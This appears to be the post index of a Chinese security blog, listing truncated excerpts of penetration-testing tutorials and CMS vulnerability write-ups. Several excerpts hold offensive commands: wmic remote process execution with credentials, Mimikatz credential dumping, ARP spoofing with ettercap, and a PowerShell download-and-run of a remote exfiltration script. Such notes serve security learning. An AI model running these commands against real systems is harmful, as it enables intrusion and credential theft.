qianxiao996欢迎您

一个什么也不精通的白帽子

如何做一名合格的白帽子?

请遵守以下条例: 目录 第一章 总 则 第二章 网络安全支持与促进 第三章 网络运行安全 第一节 一般规定 第二节 关键信息基础设施的运行安全 第四章 网络信息安全 第五章 监测预警与应急处置 第六章 法律责任 第七章 附 则 条文 第一章 总 则 第一条 为了保障网...

2018-10-17 23:23:18

阅读数 176

评论数 0

内网渗透----横向移动

SMB WMI 使用wmic查询远程主机进程信息: wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process list brief 创建进程: wmic /node:192.168.91.131 /...

2019-05-31 20:03:42

阅读数 60

评论数 0

内网渗透----常见后门

0x01.综合利用手法 1.Smbrelay smbrelayx.py 由于此手法是中间件攻击,需要关闭SMB的签名措施,Windows Server默认开启,其他系统默认关闭,使用 nmap扫描一下未开启签名的机器: nmap -sT -p 445 --open --script smb-sec...

2019-05-31 20:03:29

阅读数 77

评论数 0

内网渗透----windows信息收集整理

一、基础信息收集 1.信息收集类型 操作系统版本、内核、架构 是否在虚拟化环境中,已安装的程序、补丁 网络配置及连接 防火墙设置 用户信息、历史纪录(浏览器、登陆密码) 共享信息、敏感文件、缓存信息、服务等 2.系统信息 systeminfo 功能:心事有关计算机及其操作系统的详细配置,包括...

2019-04-14 18:23:39

阅读数 25

评论数 0

内网渗透----域内信息收集

工具使用 Nslookup nslookup # 进入交互式界面 set type=all # 设置记录类型,可以设置为srv _ldap._tcp.dc._msdcs.school.c...

2019-04-14 18:17:08

阅读数 79

评论数 0

PowerSploit的使用

Invoke-Mimikatz(依赖管理员) Import-Module .\invoke-mimikatz.ps1 Invoke-Mimikatz –DumpCreds 使用Invoke-Mimikatz –command “mimikatz命令”来执行命令: Invoke-Mimikatz...

2019-03-26 18:07:55

阅读数 30

评论数 0

74CMS 3.0 SQL注入漏洞后台

代码审计工具:seay CMS:74CMS3.0 一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点...

2019-03-26 18:07:36

阅读数 69

评论数 0

内网渗透----文件传输

0x01.Windows目标 1.FTP echo open 192.168.0.23 2121 >> 1.txt //登陆FTP服务器 echo 123>&a...

2019-03-08 11:59:13

阅读数 89

评论数 0

YCCMS 3.3 CSRF漏洞--代码执行

一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\YCCMS),点击确定 漏洞分析 1.点击展开左侧admin目录,在...

2019-02-14 17:29:23

阅读数 68

评论数 0

74CMS 3.0 存储型XSS漏洞

一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpSt...

2019-01-09 15:42:53

阅读数 105

评论数 0

内网渗透----欺骗攻击

Ettercap ettercap ettercap -i eth0 -T -q -M arp:remote /192.168.199.171// /192.168.199.1// driftnet driftnet -i eth0 -a tcpdump tcpdump -i eth0 arp...

2019-01-09 15:42:24

阅读数 237

评论数 0

74CMS 3.0 CSRF漏洞

一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpSt...

2018-12-27 19:31:25

阅读数 111

评论数 0

phpmyadmin 4.8.1 文件包含漏

一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\phpmyadmin),点击确定 漏洞分析 1.双击index.ph...

2018-12-27 19:31:11

阅读数 101

评论数 0

phpcms 2008 变量覆盖漏洞

一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\ phpcms 2008),点击确定 漏洞分析 1.点击展开/yp/...

2018-12-26 17:47:15

阅读数 60

评论数 0

74CMS 3.4 反射型XSS漏洞

一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.4源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpSt...

2018-12-26 17:46:53

阅读数 115

评论数 0

内网渗透----密码记录

Windows Powershell iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-...

2018-12-25 15:52:43

阅读数 194

评论数 0

python程序unix密码破解

# qianxiao996精心制作 #博客地址:https://blog.csdn.net/qq_36374896 #!/usr/bin/env python #指定这是一个python文件,使用这个解释器执行 #-*- coding:utf-8 -*- #设定编码...

2018-12-25 15:52:27

阅读数 73

评论数 0

python监控cpu 内存实现邮件微信报警

# qianxiao996精心制作 #博客地址:https://blog.csdn.net/qq_36374896 import psutil, time,smtplib,socket import datetime from wechatpy import WeChatClient from e...

2018-12-23 11:52:02

阅读数 677

评论数 0

内网渗透----域内横向移动

0x01.MS14-068 kerkeo工具 https://github.com/gentilkiwi/kekeo ) klist klist purge 删除所有票据 直接访问域控制器的C盘目录: dir \\qianxiao996-dm.qianxiao996.com\C$ 查...

2018-12-20 22:03:10

阅读数 979

评论数 0

metinfo 6.0 任意文件读取漏洞

一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\metinfo),点击确定 漏洞分析 1.点击展开左侧app\sys...

2018-12-20 22:02:56

阅读数 325

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭